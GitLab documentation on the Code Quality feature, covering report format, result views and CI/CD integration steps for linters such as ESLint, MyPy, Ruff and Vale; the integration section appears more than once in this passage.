    "fingerprint": "7815696ecbf1c96e6894b779456d330e",
    "severity": "minor",
    "location": {
      "path": "lib/index.js",
      "lines": {
        "begin": 42
      }
    }
  }
]
```

## Integrate common tools with Code Quality

Many tools natively support the required [report format](#code-quality-report-format) to integrate their results with Code Quality. They may call it a "CodeClimate report", "GitLab Code Quality report", or another similar name.

Other tools can be configured to create JSON output by providing a custom template or format specification. Because the [report format](#code-quality-report-format) has only a few required fields, you may be able to use this output type to create a report for Code Quality.
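As a concrete sketch of this pattern, the job below runs a hypothetical linter (`my-linter` and its flags are placeholders, not a real tool) and exposes its output as a Code Quality report:

```yaml
# Hypothetical job: run a linter that can emit the Code Quality JSON
# format, then declare the file as a Code Quality report artifact.
lint:
  image: node:20
  script:
    - my-linter --format codeclimate --output gl-code-quality-report.json .
  artifacts:
    reports:
      codequality: gl-code-quality-report.json
```

The `artifacts:reports:codequality` declaration is what makes GitLab pick up the file; everything else in the job is whatever your tool needs to run.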
If you already use a tool in your CI/CD pipeline, you should adapt the existing job to add a Code Quality report. Adapting the existing job avoids adding a separate job that could confuse developers and make your pipelines take longer to run. If you don't already use a tool, you can write a CI/CD job from scratch or adopt the tool by using a component from [the CI/CD Catalog](../components/_index.md#cicd-catalog).

### Code scanning tools

#### ESLint

If you already have an [ESLint](https://eslint.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Add [`eslint-formatter-gitlab`](https://www.npmjs.com/package/eslint-formatter-gitlab) as a development dependency in your project.
1. Add the `--format gitlab` option to the command you use to run ESLint.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.
   - By default, the formatter reads your CI/CD configuration and infers the filename where it should save the report. If the formatter can't infer the filename you used in your artifact declaration, set the CI/CD variable `ESLINT_CODE_QUALITY_REPORT` to the filename specified for your artifact, such as `gl-code-quality-report.json`.

You can also use or adapt the [ESLint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### Stylelint

If you already have a [Stylelint](https://stylelint.io/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Add [`@studiometa/stylelint-formatter-gitlab`](https://www.npmjs.com/package/@studiometa/stylelint-formatter-gitlab) as a development dependency in your project.
1. Add the `--custom-formatter=@studiometa/stylelint-formatter-gitlab` option to the command you use to run Stylelint.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.
   - By default, the formatter reads your CI/CD configuration and infers the filename where it should save the report. If the formatter can't infer the filename you used in your artifact declaration, set the CI/CD variable `STYLELINT_CODE_QUALITY_REPORT` to the filename specified for your artifact, such as `gl-code-quality-report.json`.

For more details and an example CI/CD job definition, see the [documentation for `@studiometa/stylelint-formatter-gitlab`](https://www.npmjs.com/package/@studiometa/stylelint-formatter-gitlab#usage).

#### MyPy

If you already have a [MyPy](https://mypy-lang.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Install [`mypy-gitlab-code-quality`](https://pypi.org/project/mypy-gitlab-code-quality/) as a dependency in your project.
1. Change your `mypy` command to send its output to a file.
1. Add a step to your job `script` to reprocess the file into the required format by using `mypy-gitlab-code-quality`. For example:

   ```yaml
     - mypy $(find -type f -name "*.py" ! -path "**/.venv/**") --no-error-summary > mypy-out.txt || true  # "|| true" prevents job failure when mypy finds errors
     - mypy-gitlab-code-quality < mypy-out.txt > gl-code-quality-report.json
   ```

1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt the [MyPy CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.
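Put together, the MyPy steps above can be combined into a single job. A minimal sketch, in which the image tag and the inline `pip install` are illustrative — pin versions to suit your project:

```yaml
mypy:
  image: python:3.12
  script:
    - pip install mypy mypy-gitlab-code-quality
    # "|| true" keeps the job green so the report still uploads;
    # findings are surfaced by Code Quality instead of a failed job.
    - mypy $(find -type f -name "*.py" ! -path "**/.venv/**") --no-error-summary > mypy-out.txt || true
    - mypy-gitlab-code-quality < mypy-out.txt > gl-code-quality-report.json
  artifacts:
    reports:
      codequality: gl-code-quality-report.json
```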
#### Flake8

If you already have a [Flake8](https://flake8.pycqa.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Install [`flake8-gl-codeclimate`](https://github.com/awelzel/flake8-gl-codeclimate) as a dependency in your project.
1. Add the arguments `--format gl-codeclimate --output-file gl-code-quality-report.json` to the command you use to run Flake8.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt the [Flake8 CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### Pylint

If you already have a [Pylint](https://pypi.org/project/pylint/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Install [`pylint-gitlab`](https://pypi.org/project/pylint-gitlab/) as a dependency in your project.
1. Add the argument `--output-format=pylint_gitlab.GitlabCodeClimateReporter` to the command you use to run Pylint.
1. Change your `pylint` command to send its output to a file.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt the [Pylint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### Ruff

If you already have a [Ruff](https://docs.astral.sh/ruff/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Add the argument `--output-format=gitlab` to the command you use to run Ruff.
1. Change your `ruff check` command to send its output to a file.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt the [documented Ruff GitLab CI/CD integration](https://docs.astral.sh/ruff/integrations/#gitlab-cicd) to run the scan and integrate its output with Code Quality.

#### golangci-lint

If you already have a [`golangci-lint`](https://golangci-lint.run/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Add the output-format arguments to the command you use to run `golangci-lint`:
   - For v1, add `--out-format code-climate:gl-code-quality-report.json,line-number`.
   - For v2, add `--output.code-climate.path=gl-code-quality-report.json`.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt the [golangci-lint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### PMD Copy/Paste Detector

The [PMD Copy/Paste Detector (CPD)](https://pmd.github.io/pmd/pmd_userdocs_cpd.html) requires additional configuration because its default output doesn't conform to the required format.

You can use or adapt the [PMD CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### SwiftLint

Using [SwiftLint](https://realm.github.io/SwiftLint/) requires additional configuration because its default output doesn't conform to the required format.

You can use or adapt the [Swiftlint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.
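Scanners such as PMD CPD and SwiftLint above are integrated through CI/CD components rather than a formatter flag. Including a component follows the standard `include:component` syntax; the path and version below are illustrative, so copy the exact snippet from the component's catalog page:

```yaml
include:
  # Illustrative component reference — substitute the real path and
  # version shown on the component's CI/CD Catalog page.
  - component: $CI_SERVER_FQDN/code-quality-oss/codequality-os-scanners-integration/swiftlint@1.0.0
```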
#### RuboCop

Using [RuboCop](https://rubocop.org/) requires additional configuration because its default output doesn't conform to the required format.

You can use or adapt the [RuboCop CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### Roslynator

Using [Roslynator](https://josefpihrt.github.io/docs/roslynator/) requires additional configuration because its default output doesn't conform to the required format.

You can use or adapt the [Roslynator CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

### Documentation scanning tools

You can use Code Quality to scan any file stored in a repository, even if it isn't code.

#### Vale

If you already have a [Vale](https://vale.sh/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Create a Vale template file in your repository that defines the required format.
   - You can copy the open source [template used to check GitLab documentation](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/vale-json.tmpl).
   - You can also use another open source variant like the one used in the community [`gitlab-ci-utils` Vale project](https://gitlab.com/gitlab-ci-utils/container-images/vale/-/blob/main/vale/vale-glcq.tmpl). This community project also provides [a pre-made container image](https://gitlab.com/gitlab-ci-utils/container-images/vale) that includes the same template so you can use it directly in your pipelines.
1. Add the arguments `--output="$VALE_TEMPLATE_PATH" --no-exit` to the command you use to run Vale.
1. Change your `vale` command to send its output to a file.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt an open source job definition to run the scan and integrate its output with Code Quality, for example:

- The [Vale linting step](https://gitlab.com/gitlab-org/gitlab/-/blob/94f870b8e4b965a41dd2ad576d50f7eeb271f117/.gitlab/ci/docs.gitlab-ci.yml#L71-87) used to check GitLab documentation.
- The community [`gitlab-ci-utils` Vale project](https://gitlab.com/gitlab-ci-utils/container-images/vale#usage).

#### markdownlint-cli2

If you already have a [markdownlint-cli2](https://github.com/DavidAnson/markdownlint-cli2) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Add [`markdownlint-cli2-formatter-codequality`](https://www.npmjs.com/package/markdownlint-cli2-formatter-codequality) as a development dependency in your project.
1. If you don't already have one, create a `.markdownlint-cli2.jsonc` file at the top level of your repository.
1. Add an `outputFormatters` directive to `.markdownlint-cli2.jsonc`:

   ```json
   {
     "outputFormatters": [
       [ "markdownlint-cli2-formatter-codequality" ]
     ]
   }
   ```

1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file. By default, the report file is named `markdownlint-cli2-codequality.json`.
1. Recommended. Add the report's filename to the repository's `.gitignore` file.

For more details and an example CI/CD job definition, see the [documentation for `markdownlint-cli2-formatter-codequality`](https://www.npmjs.com/package/markdownlint-cli2-formatter-codequality).
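With the formatter configured as described, the CI/CD job itself stays small. A minimal sketch, in which the image tag and the glob are illustrative and `|| true` keeps lint findings from failing the job:

```yaml
markdownlint:
  image: node:20
  script:
    - npm ci
    # The formatter declared in .markdownlint-cli2.jsonc writes
    # markdownlint-cli2-codequality.json as a side effect of the run.
    - npx markdownlint-cli2 "**/*.md" || true
  artifacts:
    reports:
      codequality: markdownlint-cli2-codequality.json
```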
--- stage: Application Security Testing group: Static Analysis info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Code Quality breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Code Quality identifies maintainability issues before they become technical debt. The automated feedback that occurs during code reviews can help your team write better code. The findings appear directly in merge requests, making problems visible when they're most cost-effective to fix. Code Quality works with multiple programming languages and integrates with common linters, style checkers, and complexity analyzers. Your existing tools can feed into the Code Quality workflow, preserving your team's preferences while standardizing how results are displayed. ## Features per tier Different features are available in different [GitLab tiers](https://about.gitlab.com/pricing/), as shown in the following table: | Feature | In Free | In Premium | In Ultimate | |:--------------------------------------------------------------------------------------------|:-------------------------------------|:-------------------------------------|:------------| | [Import Code Quality results from CI/CD jobs](#import-code-quality-results-from-a-cicd-job) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [Use CodeClimate-based scanning](#use-the-built-in-code-quality-cicd-template-deprecated) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [See findings in a merge request widget](#merge-request-widget) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [See 
findings in a pipeline report](#pipeline-details-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [See findings in the merge request changes view](#merge-request-changes-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes | | [Analyze overall health in a project quality summary view](#project-quality-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes | ## Scan code for quality violations Code Quality is an open system that supports importing results from many scanning tools. To find violations and surface them, you can: - Directly use a scanning tool and [import its results](#import-code-quality-results-from-a-cicd-job). _(Preferred.)_ - [Use a built-in CI/CD template](#use-the-built-in-code-quality-cicd-template-deprecated) to enable scanning. The template uses the CodeClimate engine, which wraps common open source tools. _(Deprecated.)_ You can capture results from multiple tools in a single pipeline. For example, you can run a code linter to scan your code along with a language linter to scan your documentation, or you can use a standalone tool along with CodeClimate-based scanning. Code Quality combines all of the reports so you see all of them when you [view results](#view-code-quality-results). ### Import Code Quality results from a CI/CD job Many development teams already use linters, style checkers, or other tools in their CI/CD pipelines to automatically detect violations of coding standards. You can make the findings from these tools easier to see and fix by integrating them with Code Quality. To see if your tool already has a documented integration, see [Integrate common tools with Code Quality](#integrate-common-tools-with-code-quality). To integrate a different tool with Code Quality: 1. Add the tool to your CI/CD pipeline. 1. 
Configure the tool to output a report as a file. - This file must use a [specific JSON format](#code-quality-report-format). - Many tools support this output format natively. They may call it a "CodeClimate report", "GitLab Code Quality report", or another similar name. - Other tools can sometimes create JSON output using a custom JSON format or template. Because the [report format](#code-quality-report-format) has only a few required fields, you may be able to use this output type to create a report for Code Quality. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that matches this file. Now, after the pipeline runs, the quality tool's results are [processed and displayed](#view-code-quality-results). ### Use the built-in Code Quality CI/CD template (deprecated) {{< alert type="warning" >}} This feature was [deprecated](../../update/deprecations.md#codeclimate-based-code-quality-scanning-will-be-removed) in GitLab 17.3 and is planned for removal in 19.0. [Integrate the results from a supported tool directly](#import-code-quality-results-from-a-cicd-job) instead. {{< /alert >}} Code Quality also includes a built-in CI/CD template, `Code-Quality.gitlab-ci.yaml`. This template runs a scan based on the open source CodeClimate scanning engine. The CodeClimate engine runs: - Basic maintainability checks for a [set of supported languages](https://docs.codeclimate.com/docs/supported-languages-for-maintainability). - A configurable set of [plugins](https://docs.codeclimate.com/docs/list-of-engines), which wrap open source scanners, to analyze your source code. For more details, see [Configure CodeClimate-based Code Quality scanning](code_quality_codeclimate_scanning.md). #### Migrate from CodeClimate-based scanning The CodeClimate engine uses a customizable set of [analysis plugins](code_quality_codeclimate_scanning.md#configure-codeclimate-analysis-plugins). Some are on by default; others must be explicitly enabled. 
The following integrations are available to replace the built-in plugins: | Plugin | On by default | Replacement | |--------------|------------------------------------------------------------|-------------| | Duplication | {{< icon name="check-circle" >}} Yes | [Integrate PMD Copy/Paste Detector](#pmd-copypaste-detector). | | ESLint | {{< icon name="check-circle" >}} Yes | [Integrate ESLint](#eslint). | | gofmt | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint) and enable the [gofmt linter](https://golangci-lint.run/usage/linters#gofmt). | | golint | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint) and enable one of the included linters that replaces golint. golint is [deprecated and frozen](https://github.com/golang/go/issues/38968). | | govet | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint). golangci-lint [includes govet by default](https://golangci-lint.run/usage/linters#enabled-by-default). | | markdownlint | {{< icon name="dotted-circle" >}} No (community-supported) | [Integrate markdownlint-cli2](#markdownlint-cli2). | | pep8 | {{< icon name="dotted-circle" >}} No | Integrate an alternative Python linter like [Flake8](#flake8), [Pylint](#pylint), or [Ruff](#ruff). | | RuboCop | {{< icon name="dotted-circle" >}} Yes | [Integrate RuboCop](#rubocop). | | SonarPython | {{< icon name="dotted-circle" >}} No | Integrate an alternative Python linter like [Flake8](#flake8), [Pylint](#pylint), or [Ruff](#ruff). | | Stylelint | {{< icon name="dotted-circle" >}} No (community-supported) | [Integrate Stylelint](#stylelint). | | SwiftLint | {{< icon name="dotted-circle" >}} No | [Integrate SwiftLint](#swiftlint). 
| ## View Code Quality results Code Quality results are shown in the: - [Merge request widget](#merge-request-widget) - [Merge request changes view](#merge-request-changes-view) - [Pipeline details view](#pipeline-details-view) - [Project quality view](#project-quality-view) ### Merge request widget Code Quality analysis results display in the merge request widget area if a report from the target branch is available for comparison. The merge request widget displays Code Quality findings and resolutions that were introduced by the changes made in the merge request. Multiple Code Quality findings with identical fingerprints display as a single entry in the merge request widget. Each individual finding is available in the full report available in the **Pipeline** details view. ![List of code quality issues in the merge request, ordered by decreasing severity](img/code_quality_merge_request_widget_v18_2.png) ### Merge request changes view {{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Code Quality results display in the merge request **Changes** view. Lines containing Code Quality issues are marked by a symbol beside the gutter. Select the symbol to see the list of issues, then select an issue to see its details. ![Lines in a merge request's changes tab marked with a symbol to indicate code quality issues](img/code_quality_changes_view_v18_2.png) ### Pipeline details view {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} The full list of Code Quality violations generated by a pipeline is shown in the **Code Quality** tab of the pipeline's details page. The pipeline details view displays all Code Quality findings that were found on the branch it was run on. 
![List of all issues in the branch, ordered by decreasing severity](img/code_quality_pipeline_details_view_v18_2.png) ### Project quality view {{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed - Status: Beta {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/72724) in GitLab 14.5 [with a flag](../../administration/feature_flags/_index.md) named `project_quality_summary_page`. This feature is in [beta](../../policy/development_stages_support.md). Disabled by default. {{< /history >}} The project quality view displays an overview of the code quality findings. The view can be found under **Analyze > CI/CD analytics**, and requires [`project_quality_summary_page`](../../administration/feature_flags/_index.md) feature flag to be enabled for this particular project. ![Total number of issues, called violations, followed by the number of issues of each severity](img/code_quality_summary_v15_9.png) ## Code Quality report format You can [import Code Quality results](#import-code-quality-results-from-a-cicd-job) from any tool that can output a report in the following format. This format is a version of the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) that includes a smaller number of fields. The file you provide as [Code Quality report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) must contain a single JSON array. Each object in that array must have at least the following properties: | Name | Type | Description | |-----------------------------------------------------------|---------|-------------| | `description` | String | A human-readable description of the code quality violation. | | `check_name` | String | A unique name representing the check, or rule, associated with this violation. 
| | `fingerprint` | String | A unique fingerprint to identify this specific code quality violation, such as a hash of its contents. | | `location.path` | String | The file containing the code quality violation, expressed as a relative path in the repository. Do not prefix with `./`. | | `location.lines.begin` or `location.positions.begin.line` | Integer | The line on which the code quality violation occurred. | | `severity` | String | The severity of the violation, can be one of `info`, `minor`, `major`, `critical`, or `blocker`. | The format is different from the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) in the following ways: - Although the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) supports more properties, Code Quality only processes the fields listed previously. - The GitLab parser does not allow a [byte order mark](https://en.wikipedia.org/wiki/Byte_order_mark) at the beginning of the file. For example, this is a compliant report: ```json [ { "description": "'unused' is assigned a value but never used.", "check_name": "no-unused-vars", "fingerprint": "7815696ecbf1c96e6894b779456d330e", "severity": "minor", "location": { "path": "lib/index.js", "lines": { "begin": 42 } } } ] ``` ## Integrate common tools with Code Quality Many tools natively support the required [report format](#code-quality-report-format) to integrate their results with Code Quality. They may call it a "CodeClimate report", "GitLab Code Quality report", or another similar name. Other tools can be configured to create JSON output by providing a custom template or format specification. Because the [report format](#code-quality-report-format) has only a few required fields, you may be able to use this output type to create a report for Code Quality. 
If you already use a tool in your CI/CD pipeline, you should adapt the existing job to add a Code Quality report. Adapting the existing job prevents you from running a separate job that may confuse developers and make your pipelines take longer to run. If you don't already use a tool, you can write a CI/CD job from scratch or adopt the tool by using a component from [the CI/CD Catalog](../components/_index.md#cicd-catalog).

### Code scanning tools

#### ESLint

If you already have an [ESLint](https://eslint.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Add [`eslint-formatter-gitlab`](https://www.npmjs.com/package/eslint-formatter-gitlab) as a development dependency in your project.
1. Add the `--format gitlab` option to the command you use to run ESLint.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.
   - By default, the formatter reads your CI/CD configuration and infers the filename where it should save the report. If the formatter can't infer the filename you used in your artifact declaration, set the CI/CD variable `ESLINT_CODE_QUALITY_REPORT` to the filename specified for your artifact, such as `gl-code-quality-report.json`.

You can also use or adapt the [ESLint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### Stylelint

If you already have a [Stylelint](https://stylelint.io/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Add [`@studiometa/stylelint-formatter-gitlab`](https://www.npmjs.com/package/@studiometa/stylelint-formatter-gitlab) as a development dependency in your project.
1. Add the `--custom-formatter=@studiometa/stylelint-formatter-gitlab` option to the command you use to run Stylelint.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.
   - By default, the formatter reads your CI/CD configuration and infers the filename where it should save the report. If the formatter can't infer the filename you used in your artifact declaration, set the CI/CD variable `STYLELINT_CODE_QUALITY_REPORT` to the filename specified for your artifact, such as `gl-code-quality-report.json`.

For more details and an example CI/CD job definition, see the [documentation for `@studiometa/stylelint-formatter-gitlab`](https://www.npmjs.com/package/@studiometa/stylelint-formatter-gitlab#usage).

#### MyPy

If you already have a [MyPy](https://mypy-lang.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Install [`mypy-gitlab-code-quality`](https://pypi.org/project/mypy-gitlab-code-quality/) as a dependency in your project.
1. Change your `mypy` command to send its output to a file.
1. Add a step to your job `script` to reprocess the file into the required format by using `mypy-gitlab-code-quality`. For example:

   ```yaml
   # "|| true" prevents the job from failing when mypy finds errors
   - mypy $(find -type f -name "*.py" ! -path "**/.venv/**") --no-error-summary > mypy-out.txt || true
   - mypy-gitlab-code-quality < mypy-out.txt > gl-code-quality-report.json
   ```

1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt the [MyPy CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.
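If no ready-made formatter fits your setup, the transformation such converters perform is straightforward. This sketch is an illustration only (not how `mypy-gitlab-code-quality` is implemented): it parses MyPy's standard `path:line: level: message` output lines into report entries, with a simplified regex that ignores column numbers:

```python
import hashlib
import re

# Simplified pattern for mypy's default "<path>:<line>: <level>: <message>" lines.
MYPY_LINE = re.compile(
    r"^(?P<path>[^:]+):(?P<line>\d+): (?P<level>error|note): (?P<message>.*)$"
)

def to_code_quality(mypy_line):
    """Convert one mypy output line into a Code Quality report entry."""
    match = MYPY_LINE.match(mypy_line)
    if match is None:
        return None  # summary lines and unparseable output are skipped
    return {
        "description": match["message"],
        "check_name": "mypy",
        # Hash the whole line so the fingerprint is stable across runs.
        "fingerprint": hashlib.md5(mypy_line.encode()).hexdigest(),
        "severity": "major" if match["level"] == "error" else "info",
        "location": {
            "path": match["path"],
            "lines": {"begin": int(match["line"])},
        },
    }

issue = to_code_quality(
    "lib/app.py:12: error: Incompatible return value type  [return-value]"
)
```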
#### Flake8

If you already have a [Flake8](https://flake8.pycqa.org/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Install [`flake8-gl-codeclimate`](https://github.com/awelzel/flake8-gl-codeclimate) as a dependency in your project.
1. Add the arguments `--format gl-codeclimate --output-file gl-code-quality-report.json` to the command you use to run Flake8.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt the [Flake8 CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### Pylint

If you already have a [Pylint](https://pypi.org/project/pylint/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Install [`pylint-gitlab`](https://pypi.org/project/pylint-gitlab/) as a dependency in your project.
1. Add the argument `--output-format=pylint_gitlab.GitlabCodeClimateReporter` to the command you use to run Pylint.
1. Change your `pylint` command to send its output to a file.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt the [Pylint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### Ruff

If you already have a [Ruff](https://docs.astral.sh/ruff/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Add the argument `--output-format=gitlab` to the command you use to run Ruff.
1. Change your `ruff check` command to send its output to a file.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt the [documented Ruff GitLab CI/CD integration](https://docs.astral.sh/ruff/integrations/#gitlab-cicd) to run the scan and integrate its output with Code Quality.

#### golangci-lint

If you already have a [`golangci-lint`](https://golangci-lint.run/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Add the report output arguments to the command you use to run `golangci-lint`:
   - For v1, add `--out-format code-climate:gl-code-quality-report.json,line-number`.
   - For v2, add `--output.code-climate.path=gl-code-quality-report.json`.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt the [golangci-lint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### PMD Copy/Paste Detector

The [PMD Copy/Paste Detector (CPD)](https://pmd.github.io/pmd/pmd_userdocs_cpd.html) requires additional configuration because its default output doesn't conform to the required format.

You can use or adapt the [PMD CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### SwiftLint

Using [SwiftLint](https://realm.github.io/SwiftLint/) requires additional configuration because its default output doesn't conform to the required format.

You can use or adapt the [Swiftlint CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.
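If you run more than one of these scanners in the same pipeline, each writes its own report file. Should you want to publish a single combined file instead, a small post-processing step can merge them. The `merge_reports` helper below is a hypothetical sketch, not part of any tool above; de-duplicating on the `fingerprint` field avoids reporting the same violation twice:

```python
def merge_reports(*reports):
    """Combine issue lists from several scanners into one report,
    keeping only the first occurrence of each fingerprint."""
    seen = set()
    merged = []
    for report in reports:
        for issue in report:
            if issue["fingerprint"] not in seen:
                seen.add(issue["fingerprint"])
                merged.append(issue)
    return merged

# Tiny inline example; in practice you would json.load each report file.
flake8_issues = [{"fingerprint": "aaa", "description": "line too long"}]
pylint_issues = [
    {"fingerprint": "aaa", "description": "line too long"},  # duplicate finding
    {"fingerprint": "bbb", "description": "unused import"},
]
combined = merge_reports(flake8_issues, pylint_issues)
```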
#### RuboCop

Using [RuboCop](https://rubocop.org/) requires additional configuration because its default output doesn't conform to the required format.

You can use or adapt the [RuboCop CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

#### Roslynator

Using [Roslynator](https://josefpihrt.github.io/docs/roslynator/) requires additional configuration because its default output doesn't conform to the required format.

You can use or adapt the [Roslynator CI/CD component](https://gitlab.com/explore/catalog/components/code-quality-oss/codequality-os-scanners-integration) to run the scan and integrate its output with Code Quality.

### Documentation scanning tools

You can use Code Quality to scan any file stored in a repository, even if it isn't code.

#### Vale

If you already have a [Vale](https://vale.sh/) job in your CI/CD pipelines, you should add a report to send its output to Code Quality. To integrate its output:

1. Create a Vale template file in your repository that defines the required format.
   - You can copy the open source [template used to check GitLab documentation](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/vale-json.tmpl).
   - You can also use another open source variant like the one used in the community [`gitlab-ci-utils` Vale project](https://gitlab.com/gitlab-ci-utils/container-images/vale/-/blob/main/vale/vale-glcq.tmpl). This community project also provides [a pre-made container image](https://gitlab.com/gitlab-ci-utils/container-images/vale) that includes the same template so you can use it directly in your pipelines.
1. Add the arguments `--output="$VALE_TEMPLATE_PATH" --no-exit` to the command you use to run Vale.
1. Change your `vale` command to send its output to a file.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that points to the location of the report file.

You can also use or adapt an open source job definition to run the scan and integrate its output with Code Quality, for example:

- The [Vale linting step](https://gitlab.com/gitlab-org/gitlab/-/blob/94f870b8e4b965a41dd2ad576d50f7eeb271f117/.gitlab/ci/docs.gitlab-ci.yml#L71-87) used to check GitLab documentation.
- The community [`gitlab-ci-utils` Vale project](https://gitlab.com/gitlab-ci-utils/container-images/vale#usage).

#### markdownlint-cli2

